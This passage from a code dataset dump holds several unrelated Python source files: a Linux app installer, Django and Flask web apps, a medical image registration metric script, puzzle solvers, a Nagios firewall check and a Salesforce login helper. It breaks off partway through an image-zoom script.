apps.app_dnf import upgrade_software\nfrom apps.app_dnf import install_software\nfrom apps.app_yum import install_software_yum\nfrom apps.app_snap import install_software_snap\nfrom apps.app_manual import install_manual_software\nimport logging\n#import sys\n#sys.path.insert(1, '../config')\nimport config.settings\n\nappsFile = \"apps/apps.json\"\nf_null = open(os.devnull, 'w')\ninstaller_text = \"Status: install ok installed\"\n\n\ndef install(software_installation_type, name, description, software_check, software, pre_commands, post_commands,\n software_url, software_extra_pre_argument, software_extra_post_argument, install_group):\n result = 0\n logging.info(\"Installing %s over %s\", name, software_installation_type)\n if software_installation_type == 'manual':\n result = install_manual_software(software, software_url)\n elif software_installation_type == 'snap':\n result = install_software_snap(name, description, software_check, software, pre_commands, post_commands,\n software_extra_pre_argument, software_extra_post_argument)\n elif software_installation_type == 'yum':\n result = install_software_yum(name, description, software_check, software, pre_commands, post_commands,\n software_extra_pre_argument, software_extra_post_argument)\n else:\n result = install_software(name, description, software_check, software, pre_commands, post_commands,\n software_extra_pre_argument, software_extra_post_argument, install_group)\n return result\n\n\n# install_software(vim_app, None, vim_app, None)\n\ndef install_apps():\n logging.info(\"Installing apps\")\n \"\"\" Software \"\"\"\n apps_file = open(appsFile)\n logging.debug(\"File %s get.\", appsFile)\n applications = json.load(apps_file)\n logging.debug(\"File %s loaded on JSON format\", appsFile)\n update_software()\n upgrade_software()\n for app in applications:\n name = app[\"name\"]\n description = app[\"description\"]\n software_check = app[\"software_check\"]\n type_installation = app[\"type\"]\n software = app[\"software\"]\n pre_commands = app[\"pre_commands\"]\n post_commands = app[\"post_commands\"]\n url = app[\"url\"]\n extra_pre_argument = app[\"extra_pre_argument\"]\n extra_post_argument = app[\"extra_post_argument\"]\n install_group = app[\"install_group\"]\n install(type_installation, name, description, software_check, software, pre_commands, post_commands, url, extra_pre_argument, extra_post_argument, install_group)\n\n\ninstall_apps()\n","repo_name":"ironcero/linuxtunning","sub_path":"apps/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31145607389","text":"from django.contrib import admin\nfrom django.urls import path\n\nfrom .views import remove_friend, profile_subs, profile_friends, get_profile, add_friend, create_post, register, user_login, profile, index, change_data, change_bio, change_username, user_logout\n\nurlpatterns = [\n path('', index, name='index'),\n path('register/', register, name='user_register'),\n path('login/', user_login, name='user_login'),\n path('/', profile, name='profile'),\n path('change_data//', change_data, name='change_data'),\n path('create_post', create_post, name=\"create_post\"),\n path('change_username', change_username, name='change_username'),\n path('change_bio', change_bio, name='change_bio'),\n path('add_friend//', add_friend, name='add_friend'),\n path('remvoe_friend//', remove_friend, name='remove_friend'),\n path('get_profile', get_profile, name='get_profile'),\n path('user_logout', user_logout, name='user_logout'),\n path(\"profile//subs\", profile_subs, name='profile_subs'),\n path(\"profile//friends\", profile_friends, name='profile_friends')\n]","repo_name":"Basekeet/django-twitter","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37530919660","text":"\"\"\"\nFile taking three segmentation images (paths) as input and computing the dice metric to evaluate\nhow well the images are registered.\nThe dice scores are saved in a csv file.\n\"\"\"\n\nimport argparse\nimport os\nimport sys\n\nimport numpy as np\nimport nibabel as nib\nimport csv\nimport datetime\n\n\nif __name__ == \"__main__\":\n\n # -------------------------------------------------------------------------------------------------------- #\n # ---- PARSER ARGUMENTS ---- #\n # -------------------------------------------------------------------------------------------------------- #\n\n # parse command line\n p = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\n description=f'Evaluate the registration of two volumes')\n\n # path parameters\n p.add_argument('--fx-seg-path', required=True, help='path to the spinal cord segmentation of the fixed image')\n p.add_argument('--moving-seg-path', required=True, help='path to the spinal cord segmentation of the moving image')\n p.add_argument('--warped-seg-path', required=True, help='path to the spinal cord segmentation of the moved image')\n\n p.add_argument('--sub-id', required=True, help='id of the subject')\n\n p.add_argument('--out-file', required=False, default='metrics_on_sc_seg.csv',\n help='path to csv summarizing the results obtained on the SC segmentation with different metrics')\n p.add_argument('--append', type=int, required=False, default=1, choices=[0, 1],\n help=\"Append results as a new line in the output csv file instead of overwriting it.\")\n\n p.add_argument('--min-dice', required=False, type=int, default=0,\n help=\"Minimum Dice score expected (percentage, to deal with int). If lower and not last-eval then \"\n \"return a sys.exit(1) to signal this low score in the bash script and proceed to an \"\n \"affine registration prior to the model's one\")\n p.add_argument('--last-eval', type=int, required=False, default=1, choices=[0, 1],\n help='Determine if this is the last evaluation that will be done (1) or not (0)')\n\n arg = p.parse_args()\n\n # -------------------------------------------------------------------------------------------------------- #\n # ---- LOADING THE VOLUMES ---- #\n # -------------------------------------------------------------------------------------------------------- #\n\n if len(arg.fx_seg_path.split('.')) > 1:\n fx_im = nib.load(arg.fx_seg_path)\n else:\n fx_im = nib.load(f'{arg.fx_seg_path}.nii.gz')\n\n if len(arg.moving_seg_path.split('.')) > 1:\n moving_im = nib.load(arg.moving_seg_path)\n else:\n moving_im = nib.load(f'{arg.moving_seg_path}.nii.gz')\n\n if len(arg.warped_seg_path.split('.')) > 1:\n moved_im = nib.load(arg.warped_seg_path)\n else:\n moved_im = nib.load(f'{arg.warped_seg_path}.nii.gz')\n\n fx_im_val = fx_im.get_fdata()\n moving_im_val = moving_im.get_fdata()\n moved_im_val = moved_im.get_fdata()\n\n # -------------------------------------------------------------------------------------------------------- #\n # ---- COMPUTE METRICS BASED ON SC SEGMENTATION OVERLAP ---- #\n # -------------------------------------------------------------------------------------------------------- #\n\n # TP --> SC seg in moving and in fixed\n # FP --> SC seg in moving but not in fixed (background)\n # TN --> Background in moving and in fixed\n # FN --> Background in moving but not in fixed (sc seg)\n\n TP_moving = np.sum(moving_im_val[fx_im_val == 1])\n FP_moving = np.sum(moving_im_val[fx_im_val == 0])\n TN_tmp_moving = moving_im_val[fx_im_val == 0]\n TN_moving = len(np.ravel(TN_tmp_moving)) - np.sum(TN_tmp_moving)\n FN_tmp_moving = moving_im_val[fx_im_val == 1]\n FN_moving = len(np.ravel(FN_tmp_moving)) - np.sum(FN_tmp_moving)\n\n TP_moved = np.sum(moved_im_val[fx_im_val == 1])\n FP_moved = np.sum(moved_im_val[fx_im_val == 0])\n TN_tmp_moved = moved_im_val[fx_im_val == 0]\n TN_moved = len(np.ravel(TN_tmp_moved)) - np.sum(TN_tmp_moved)\n FN_tmp_moved = moved_im_val[fx_im_val == 1]\n FN_moved = len(np.ravel(FN_tmp_moved)) - np.sum(FN_tmp_moved)\n\n nb_vox_moving = len(np.ravel(moving_im_val))\n nb_sc_vox_moving = np.sum(moving_im_val)\n nb_vox_moved = len(np.ravel(moved_im_val))\n nb_sc_vox_moved = np.sum(moved_im_val)\n\n # Dice --> (2 * TP) / ((FP + TP) + (TP + FN))\n dice_fx_moving = (2 * TP_moving) / (TP_moving + TP_moving + FP_moving + FN_moving)\n dice_fx_moved = (2 * TP_moved) / (TP_moved + TP_moved + FP_moved + FN_moved)\n\n if 100 * dice_fx_moved < arg.min_dice and not arg.last_eval:\n sys.exit(1)\n\n # Sensitivity --> TP / (TP + FN)\n sens_fx_moving = TP_moving / (TP_moving + FN_moving)\n sens_fx_moved = TP_moved / (TP_moved + FN_moved)\n\n # Specificity --> TN / (TN + FP)\n spec_fx_moving = TN_moving / (TN_moving + FP_moving)\n spec_fx_moved = TN_moved / (TN_moved + FP_moved)\n\n # Accuracy --> (TP + TN) / (TP + FP + FN + TN)\n acc_fx_moving = (TP_moving + TN_moving) / nb_vox_moving\n acc_fx_moved = (TP_moved + TN_moved) / nb_vox_moved\n\n # Precision --> TP / (TP + FP)\n prec_fx_moving = TP_moving / nb_sc_vox_moving\n prec_fx_moved = TP_moved / nb_sc_vox_moved\n\n # Jaccard (IoU) --> TP / (FP + TP + FN)\n jacc_fx_moving = TP_moving / (TP_moving + FP_moving + FN_moving)\n jacc_fx_moved = TP_moved / (TP_moved + FP_moved + FN_moved)\n\n res_summary = dict()\n res_summary['subject'] = arg.sub_id\n res_summary['dice_before_registration'] = dice_fx_moving\n res_summary['dice_after_registration'] = dice_fx_moved\n res_summary['jaccard_before_registration'] = jacc_fx_moving\n res_summary['jaccard_after_registration'] = jacc_fx_moved\n res_summary['sensitivity_before_registration'] = sens_fx_moving\n res_summary['sensitivity_after_registration'] = sens_fx_moved\n res_summary['precision_before_registration'] = prec_fx_moving\n res_summary['precision_after_registration'] = prec_fx_moved\n res_summary['specificity_before_registration'] = spec_fx_moving\n res_summary['specificity_after_registration'] = spec_fx_moved\n res_summary['accuracy_before_registration'] = acc_fx_moving\n res_summary['accuracy_after_registration'] = acc_fx_moved\n\n # write header (only if append=False)\n if not arg.append or not os.path.isfile(arg.out_file):\n with open(arg.out_file, 'w') as csvfile:\n header = ['Timestamp', 'Subject', 'Dice_before_registration', 'Dice_after_registration',\n 'Jaccard_before', 'Jaccard_after',\n 'Sensitivity_before', 'Sensitivity_after', 'Precision_before', 'Precision_after',\n 'Specificity_before', 'Specificity_after', 'Accuracy_before', 'Accuracy_after']\n writer = csv.DictWriter(csvfile, fieldnames=header)\n writer.writeheader()\n\n # populate data\n with open(arg.out_file, 'a') as csvfile:\n spamwriter = csv.writer(csvfile, delimiter=',')\n line = list()\n line.append(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")) # Timestamp\n for val in res_summary.keys():\n line.append(str(res_summary[val]))\n spamwriter.writerow(line)\n\n sys.exit(0)\n","repo_name":"ivadomed/multimodal-registration","sub_path":"eval_reg_on_sc_seg.py","file_name":"eval_reg_on_sc_seg.py","file_ext":"py","file_size_in_byte":7548,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"72204966312","text":"#!/usr/bin/env python\n\"\"\"Math parser.\n\nInitial messy code: 0.177/6.108/4.791 ms\nI could reverse the tokens to make life easier but that feels like cheating.\nPart 1, non-parameterized conds test: 3.313 ms\nWith the tree parser: 0.178/4.177/4.783 ms\n\"\"\"\n\nfrom typing import Callable, List, Optional\nfrom lib import aoc\n\n\nclass Node:\n \"\"\"A node can either be a single number or two nodes with an operator.\"\"\"\n\n def __init__(self, a, op=None, b=None):\n self.a = a\n self.op = op\n self.b = b\n assert (op is None) == (b is None)\n if op is None:\n assert a.isnumeric()\n assert b is None\n else:\n assert isinstance(a, type(self))\n assert isinstance(b, type(self))\n\n def compute(self) -> int:\n if self.op is None:\n return int(self.a)\n # Moving these for a map kills runtime.\n elif self.op == '*':\n return self.a.compute() * self.b.compute()\n elif self.op == '+':\n return self.a.compute() + self.b.compute()\n else:\n raise RuntimeError\n\n def __str__(self):\n if self.op is None:\n return self.a\n else:\n return f'({self.a} {self.op} {self.b})'\n\n\nclass Day18(aoc.Challenge):\n\n TESTS = (\n aoc.TestCase(part=1, inputs=\"2 * 3 + (4 * 5)\", want=26),\n aoc.TestCase(part=1, inputs=\"5 + (8 * 3 + 9 + 3 * 4 * 3)\", want=437),\n aoc.TestCase(part=1, inputs=\"5 * 9 * (7 * 3 * 3 + 9 * 3 + (8 + 6 * 4))\", want=12240),\n aoc.TestCase(part=1, inputs=\"((2 + 4 * 9) * (6 + 9 * 8 + 6) + 6) + 2 + 4 * 2\", want=13632),\n aoc.TestCase(part=2, inputs=\"1 + (2 * 3) + (4 * (5 + 6))\", want=51),\n aoc.TestCase(part=2, inputs=\"2 * 3 + (4 * 5)\", want=46),\n aoc.TestCase(part=2, inputs=\"5 + (8 * 3 + 9 + 3 * 4 * 3)\", want=1445),\n aoc.TestCase(part=2, inputs=\"5 * 9 * (7 * 3 * 3 + 9 * 3 + (8 + 6 * 4))\", want=669060),\n aoc.TestCase(part=2, inputs=\"((2 + 4 * 9) * (6 + 9 * 8 + 6) + 6) + 2 + 4 * 2\", want=23340),\n )\n\n def input_parser(self, puzzle_input: str) -> List[str]:\n \"\"\"Drop whitespace.\"\"\"\n return [line.replace(\" \", \"\") for line in puzzle_input.split('\\n')]\n\n def part1(self, parsed_input: List[str]) -> int:\n \"\"\"Treat + and * equally.\"\"\"\n conds = [lambda x: x in '+*']\n return self.sum_map(parsed_input, lambda x: self.solve(x, conds))\n\n def part2(self, parsed_input: List[str]) -> int:\n \"\"\"Split on * first making it lower precendent than +.\"\"\"\n conds = [lambda x: x == '*', lambda x: x == '+']\n return self.sum_map(parsed_input, lambda x: self.solve(x, conds))\n\n def solve(self, tokens: List[str], f: List[Callable[[str], bool]]) -> int:\n \"\"\"Tokenize, create tree and math the tree.\"\"\"\n return self.make_tree(self.tokenize(tokens), f).compute()\n\n def get_split_for(self, tokens: List[str], conds: List[Callable[[str], bool]]) -> Optional[int]:\n \"\"\"Return the split-point, respecting (x) as one block.\"\"\"\n for cond in conds:\n i = len(tokens) - 1\n depth = 0\n while i >= 0:\n if depth == 0 and cond(tokens[i]):\n return i\n if tokens[i] == ')':\n depth += 1\n elif tokens[i] == '(':\n depth -= 1\n i -= 1\n return None\n\n def make_tree(self, tokens: List[str], conds: List[Callable[[str], bool]]):\n \"\"\"Build a tree, arbitrary ordering based on the conds.\"\"\"\n def _go(tkns):\n if len(tkns) == 1:\n return Node(tkns[0])\n # Find the right-most operator and split on that. Treat parens as a block.\n i = self.get_split_for(tkns, conds)\n if i is None:\n # Ran out of tokens. Must be \"(exp)\".\n assert tkns[0] == '(' and tkns[-1] == ')'\n return _go(tkns[1:-1])\n else:\n left = _go(tkns[:i])\n op = tkns[i]\n right = _go(tkns[i + 1:])\n return Node(left, op, right)\n return _go(tokens)\n\n def tokenize(self, line: str) -> List[str]:\n \"\"\"Tokenize the input into strings of nums/+/*/().\"\"\"\n tokens = []\n i = 0\n ll = len(line)\n while i < ll:\n ss = line[i]\n if ss in '()+*':\n tokens.append(ss)\n i += 1\n else:\n j = i + 1\n while j < ll and line[j] not in '()+*':\n j += 1\n tokens.append(line[i:j])\n i = j\n return tokens\n","repo_name":"IsaacG/Advent-of-Code","sub_path":"2020/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"16084025784","text":"import os,json\nfrom sqlite3 import dbapi2 as sqlite3\nfrom flask import Flask, request, session, g, redirect, url_for, abort, \\\n render_template, flash\n\nfrom werkzeug import secure_filename\n\n\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import Markup\nimport markdown2\nfrom flask import send_from_directory\n\n\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n\n\n# create our little application :)\napp = Flask(__name__)\n\n# Load default config and override config from an environment variable\napp.config.update(dict(\n DATABASE=os.path.join(app.root_path, 'pymark.db'),\n DEBUG=True,\n UPLOAD_FOLDER = os.path.join(app.root_path, 'uploads'),\n SECRET_KEY='development key',\n BLOGNAME = \"PyMark BLog\",\n USERNAME='admin',\n PASSWORD='admin'\n))\napp.config.from_envvar('PYMARK_SETTINGS', silent=True)\n\n\ndef connect_db():\n \"\"\"Connects to the specific database.\"\"\"\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv\n\n\ndef init_db():\n \"\"\"Initializes the database.\"\"\"\n db = get_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n@app.cli.command('initdb')\ndef initdb_command():\n \"\"\"Creates the database tables.\"\"\"\n init_db()\n print('Initialized the database.')\n\n\ndef get_db():\n \"\"\"Opens a new database connection if there is none yet for the\n current application context.\n \"\"\"\n if not hasattr(g, 'sqlite_db'):\n g.sqlite_db = connect_db()\n return g.sqlite_db\n\n\ndef key_exist(key):\n if request.form.has_key(key):\n return True\n else:\n return False\n\n\n@app.teardown_appcontext\ndef close_db(error):\n \"\"\"Closes the database again at the end of the request.\"\"\"\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\n\n###################################################################Test Mode##\n\n\n@app.route('/markdown', methods=['POST'])\ndef post_markdown():\n #request.form['title']\n #request.form['content']\n #print request.form['content']\n #content = Markup(markdown.markdown(request.form['content']))\n content = markdown2.markdown( \"#\"+ request.form['title']+ \"\\n\" +request.form['content'], extras=[\"code-friendly\",\"code-color\", \"cuddled-lists\",\"tables\",\"footnotes\",\"pyshell\",\"toc\"])\n\n return content\n\n\n#===============================================================================\n# User Mode\n#===============================================================================\n\n@app.context_processor\ndef inject_nav():\n db = get_db()\n cur = db.execute('select id, title, navigation from blog where navigation=1 order by id')\n rows = cur.fetchall()\n \n result = []\n for row in rows:\n result.append((row[\"id\"],row[\"title\"]))\n return {'navs': result, 'blogname':app.config['BLOGNAME']}\n\n\n@app.route('/')\ndef index():\n db = get_db()\n cur = db.execute('select id, title, content from blog where navigation=0 order by id desc LIMIT 5')\n rows = cur.fetchall()\n #content = Markup(markdown.markdown(entries))\n #print entries\n result = []\n for row in rows:\n content = markdown2.markdown(row[\"content\"], extras=[\"code-friendly\",\"code-color\", \"cuddled-lists\",\"tables\",\"footnotes\",\"pyshell\",\"toc\"])\n #content = Markup(markdown.markdown(row[\"content\"]))\n result.append((row[\"id\"], row[\"title\"], content))\n \n return render_template('index.html', result=result)\n \n \n\n@app.route('/blog/')\n@app.route('/blog/')\ndef show_post(id=None):\n if id:\n db = get_db()\n cur = db.execute('select id, title, content from blog where id = ?', [id])\n row = cur.fetchone()\n if row:\n result = []\n content = markdown2.markdown(row[\"content\"], extras=[\"code-friendly\",\"code-color\", \"cuddled-lists\",\"tables\",\"footnotes\",\"pyshell\",\"toc\"])\n #content = Markup(markdown.markdown(row[\"content\"]))\n result.append((row[\"id\"], row[\"title\"],content))\n return render_template('blog.html', result=result)\n #return render_template('show_blog.html', **locals())\n else:\n abort(404)\n else:\n db = get_db()\n cur = db.execute('select id, title, content from blog where navigation=0 order by id desc')\n rows = cur.fetchall()\n #content = Markup(markdown.markdown(entries))\n #print entries\n result = []\n for row in rows:\n content = markdown2.markdown(row[\"content\"], extras=[\"code-friendly\",\"code-color\", \"cuddled-lists\",\"tables\",\"footnotes\",\"pyshell\",\"toc\"])\n\n result.append((row[\"id\"], row[\"title\"], content))\n \n return render_template('blog.html', result=result)\n #return render_template('show_blog.html', **locals())\n\n\n\n#===============================================================================\n# Admin Mode\n#===============================================================================\n\n\n@app.route('/admin/')\ndef admin_post():\n if not session.get('logged_in'):\n #abort(401)\n return redirect(url_for('login'))\n db = get_db()\n cur = db.execute('select id, title, navigation from blog order by id desc')\n rows = cur.fetchall()\n #content = Markup(markdown.markdown(entries))\n #print entries\n result = []\n for row in rows:\n result.append((row[\"title\"],row[\"id\"],row[\"navigation\"]))\n\n return render_template('admin.html', result=result)\n #return render_template('show_blog.html', **locals())\n\n\n@app.route('/admin/edit/')\ndef new_post():\n if not session.get('logged_in'):\n return redirect(url_for('login'))\n return render_template('editor_new.html')\n #return render_template('show_blog.html', **locals())\n\n@app.route('/admin/edit/', methods=['GET'])\ndef edit_post(id=None):\n if not session.get('logged_in'):\n return redirect(url_for('login'))\n if id:\n db = get_db()\n cur = db.execute('select id, title, content, navigation from blog where id = ?', [id])\n row = cur.fetchone()\n if row:\n #content = Markup(markdown.markdown(entries))\n #print entries\n result = []\n result.append(row[\"id\"])\n result.append(row[\"title\"])\n result.append(row[\"content\"])\n result.append(row[\"navigation\"])\n return render_template('editor_update.html', result=result)\n else:\n abort(404)\n abort(404)\n\n\n\n \n@app.route('/admin/update', methods=['POST'])\ndef update_post():\n if not session.get('logged_in'):\n return redirect(url_for('login'))\n db = get_db()\n #print request.form['type']\n #print request.form['title']\n #print request.form['content']\n if request.form['type'] == 'new':\n if 'navigation' in request.form: \n if request.form['navigation'] == \"yes\":\n db.execute(\"INSERT into blog (title, navigation, content, post_time) values (?, 1, ?, datetime('now'))\", [request.form['title'], request.form['content']])\n db.commit()\n else:\n db.execute(\"INSERT into blog (title, navigation, content, post_time) values (?, 0, ?, datetime('now'))\", [request.form['title'], request.form['content']])\n db.commit()\n \n elif request.form['type'] == 'update':\n db.execute('UPDATE blog set title=?, content=? where id= ?', [request.form['title'], request.form['content'], request.form['id']])\n db.commit()\n\n if 'navigation' in request.form: \n if request.form['navigation'] == \"yes\":\n db.execute('UPDATE blog set navigation=1 where id=?', [request.form['id']])\n db.commit()\n else:\n db.execute('UPDATE blog set navigation=0 where id=?', [request.form['id']])\n db.commit()\n \n flash('New blog was successfully updated')\n return redirect(url_for('admin_post'))\n\n\n@app.route('/admin/del/', methods=['GET'])\ndef delete_post(id=None):\n if not session.get('logged_in'):\n return redirect(url_for('login'))\n db = get_db()\n db.execute('DELETE from blog where id = ?',[id])\n db.commit()\n flash('blog was successfully deleted')\n return redirect(url_for('admin_post'))\n\n\n@app.route('/admin/upload_progress',methods=['POST'])\ndef upload_progress():\n if not session.get('logged_in'):\n return redirect(url_for('login'))\n return json.dumps('')\n \n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n@app.route('/admin/upload',methods=['GET', 'POST'])\ndef upload_file():\n if not session.get('logged_in'):\n return redirect(url_for('login'))\n \n if request.method == 'POST':\n file = request.files['file']\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return json.dumps({\"name\": \"/uploads/\"+filename})\n\n\n@app.route('/uploads/')\ndef uploaded_file(filename):\n if not session.get('logged_in'):\n return redirect(url_for('login'))\n return send_from_directory(app.config['UPLOAD_FOLDER'], filename) \n \n \n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n error = None\n if request.method == 'POST':\n if request.form['username'] != app.config['USERNAME']:\n error = 'Invalid username'\n elif request.form['password'] != app.config['PASSWORD']:\n error = 'Invalid password'\n else:\n session['logged_in'] = True\n flash('You were logged in')\n return redirect(url_for('admin_post'))\n return render_template('login.html', error=error)\n\n\n@app.route('/logout')\ndef logout():\n if not session.get('logged_in'):\n return redirect(url_for('login'))\n session.pop('logged_in', None)\n flash('You were logged out')\n return redirect(url_for('index'))","repo_name":"hacklogic/PyMarkBlog","sub_path":"uploads/pymark.py","file_name":"pymark.py","file_ext":"py","file_size_in_byte":10031,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"41256860178","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nimport nagiosplugin as np\nfrom nagiosplugin import CheckError\n\nfrom check_pa.xml_reader import XMLReader\n\n_log = logging.getLogger('nagiosplugin')\n\n\ndef create_check(args):\n \"\"\"\n Creates and configures a check for the useragent command.\n\n :return: the useragent check.\n \"\"\"\n return np.Check(\n UserAgent(args.host, args.token),\n np.ScalarContext('agent_last_heared', args.warn, args.crit),\n UserAgentContext('agent_connected'),\n UserAgentSummary())\n\n\nclass UserAgent(np.Resource):\n def __init__(self, host, token):\n self.host = host\n self.token = token\n self.cmd = 'all' \\\n ''\n self.xml_obj = XMLReader(self.host, self.token, self.cmd)\n\n def probe(self):\n \"\"\"\n Querys the REST-API and create user agent metrics.\n\n :return: a user agent metric.\n \"\"\"\n _log.info('Reading XML from: %s', self.xml_obj.build_request_url())\n soup = self.xml_obj.read()\n s = soup.result.string.strip()\n useragents = s.split('\\n\\n')\n\n for useragent in useragents:\n agent_details = useragent.split('\\n')\n if (len(agent_details) != 31) or not (agent_details[0].startswith('Agent')):\n raise CheckError('Unexpected query result!')\n\n name = agent_details[0]\n status = agent_details[1].split(':')[1].strip()\n last_heared = int(agent_details[20].split(':')[1].strip())\n\n _log.info('Checking %s ', name)\n _log.info('Found status %s', status)\n _log.info('Last heared: %i seconds ago', last_heared)\n\n yield np.Metric(name, status, context='agent_connected')\n yield np.Metric(name, last_heared, context='agent_last_heared')\n\n\nclass UserAgentContext(np.Context):\n def __init__(self, name, fmt_metric='{name} is {valueunit}',\n result_cls=np.Result):\n super(UserAgentContext, self).__init__(name, fmt_metric,\n result_cls)\n\n def evaluate(self, metric, resource):\n if metric.value == 'conn':\n return self.result_cls(np.Ok, None, metric)\n else:\n return self.result_cls(np.Critical, None, metric)\n\n\nclass UserAgentSummary(np.Summary):\n def ok(self, results):\n return 'All agents are connected and responding.'\n\n def problem(self, results):\n s = ''\n l = []\n for result in results.results:\n if result.state == np.Warn or result.state == np.Critical:\n if result.metric.context == 'agent_last_heared':\n l.append(\"%s last heared: %i seconds ago\" % (result.metric.name, result.metric.value))\n if result.metric.context == 'agent_connected':\n l.append(\"%s connection status is %s\" % (result.metric.name, result.metric.value))\n s += ', '.join(l)\n return s\n","repo_name":"ralph089/nagios_check_paloalto","sub_path":"check_pa/modules/useragent.py","file_name":"useragent.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"31122605102","text":"import boto3, os\nfrom aws_lambda_powertools import Logger\nfrom simple_salesforce import Salesforce\nfrom ssm import SsmConfig\n\nlogger = Logger(service=\"playback-loader\", child=True)\nclient = boto3.client('ssm')\n\nsf_ssm_parameter_path = os.environ.get('SF_SSM_PARAMETER_PATH')\n\n# global variable\nsf_ssm_config = None\n\nclass SfAuth:\n\n def __init__(self):\n global sf_ssm_config\n # Initialize ssm_config if it doesn't yet exist\n if sf_ssm_config is None:\n ssm = SsmConfig()\n logger.debug(\"Loading SsmConfig\")\n ssm.load_config(sf_ssm_parameter_path)\n sf_ssm_config = ssm\n\n config = sf_ssm_config.get_config()\n if len(config['cache_sf_instance']) <= 1:\n self.login()\n else:\n self.sf = Salesforce(instance=config['cache_sf_instance'],\n session_id=config['cache_session_id'])\n\n def get_sf(self):\n return self.sf\n\n def login(self):\n logger.debug(f\"SfAuth login start\")\n\n global sf_ssm_config\n config = sf_ssm_config.get_config()\n self.sf = Salesforce(username=config['username'],\n consumer_key=config['consumer_key'],\n privatekey=config['private_key'],\n domain=config['domain']) \n\n # save session to ssm to prevent login multiple time over the day\n sf_ssm_config.update_parameter(\n f\"{sf_ssm_parameter_path}/cache_session_id\", self.sf.session_id)\n sf_ssm_config.update_parameter(\n f\"{sf_ssm_parameter_path}/cache_sf_instance\", self.sf.sf_instance)\n\n # reload configuration\n sf_ssm_config.load_config(sf_ssm_parameter_path)\n logger.debug(f\"SfAuth login completed\")\n return self.sf\n","repo_name":"pattaramo/fwd-aws-connect-playback-loader","sub_path":"app/sf_auth.py","file_name":"sf_auth.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1892917153","text":"from django.urls import path\n\n\nfrom .views import post_detail, post_create, post_delete, post_user_detail, withdraw, \\\n post_comment, post_list, post_like, post_dislike\n\napp_name = 'posts'\nurlpatterns = [\n path('', post_list, name='post-list'),\n path('/', post_detail, name='post-detail'),\n path('create/', post_create, name='post-create'),\n path('/delete/', post_delete, name='post-delete'),\n path('user_detail/', post_user_detail, name='post-user-detail'),\n path('withdraw/', withdraw, name='withdraw'),\n path('/comment/', post_comment, name='post-comment'),\n path('/like/', post_like, name='post-like'),\n path('/dislike/', post_dislike, name='post-dislike'),\n\n]\n","repo_name":"HiFaMi/Django-instagram","sub_path":"app/posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12538592248","text":"class Solution:\n def longestLine(self, M: List[List[int]]) -> int:\n if len(M) == 0:\n return 0\n\n rows, cols = len(M), len(M[0])\n max_len = 0\n\n @lru_cache(maxsize=None)\n def dfs(row, col, direction):\n subpath = 0\n # directions: left, up, upleft, upright\n ro, co = direction\n new_row, new_col = row + ro, col + co\n if 0 <= new_row and new_row < rows and \\\n 0 <= new_col and new_col < cols and \\\n M[new_row][new_col] == 1:\n subpath = dfs(new_row, new_col, direction)\n \n return (M[row][col] == 1) + subpath\n\n\n for row in range(rows):\n for col in range(cols):\n for direction in [(0, 1), (-1, 0), (-1, -1), (-1, 1)]:\n max_len = max(max_len, dfs(row, col, direction))\n \n return max_len\n\n\nclass SolutionManualMemoization:\n def longestLine(self, M: List[List[int]]) -> int:\n \n if len(M) == 0:\n return 0\n \n rows, cols = len(M), len(M[0])\n max_len = 0\n \n path_counter = defaultdict(int)\n \n for row in range(rows):\n for col in range(cols):\n for direction in [row, col+.1, row-col+.2, row+col+.3]:\n new_count = (path_counter[direction] + 1) * M[row][col]\n path_counter[direction] = new_count\n max_len = max(max_len, new_count)\n \n return max_len","repo_name":"liaison/LeetCode","sub_path":"python/562_longest_line_of_consecutive_one_in_a_matrix.py","file_name":"562_longest_line_of_consecutive_one_in_a_matrix.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"70482482794","text":"import cv2 as cv\nimport numpy as np\nimport math\ndef weight(x):\n a=-0.5\n x=abs(x)\n if x<=1:\n return (a+2)*x**3-(a+3)*x**2+1\n if x<2:\n return a*x**3-5*a*x**2+8*a*x-4*a\n return 0\ndef zoom(source,filename):\n result=[np.zeros((2048,2048)),np.zeros((2048,2048)),np.zeros((2048,2048))]\n range_list=range(2048)\n range_tmp=range(4)\n for i in range_list:\n for j in range_list:\n if i>4 and i<2040 and j>4 and j<2040:\n result[0][i][j]=source[round(i/4)][round(j/4)]\n m,n,a,b=i//4,j//4,i/4-i//4,j/4-j//4\n result[1][i][j]=source[m][n]*(1-a)*(1-b)+source[m+1][n]*a*(1-b)+source[m][n+1]*(1-a)*b+source[m+1][n+1]*a*b\n for k in range_tmp:\n for w in 